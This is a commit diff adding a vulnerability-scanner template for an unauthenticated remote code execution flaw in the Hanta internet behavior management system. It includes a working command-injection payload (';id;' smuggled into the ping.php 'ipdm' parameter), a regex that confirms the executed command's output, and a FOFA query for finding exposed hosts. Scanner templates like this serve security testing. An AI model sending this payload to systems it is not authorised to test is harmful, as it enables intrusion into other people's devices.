commit
b1f7f3c3d3
|
@ -0,0 +1,32 @@
|
|||
id: hanta-rce
|
||||
|
||||
info:
|
||||
name: Hanta Internet Behavior Management System - Remote Code Execution
|
||||
author: momika233
|
||||
severity: high
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
fofa-query: app="汉塔科技上网行为管理系统"
|
||||
tags: hanta,rce,unauth
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/dgn/dgn_tools/ping.php?ipdm=2;id;"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue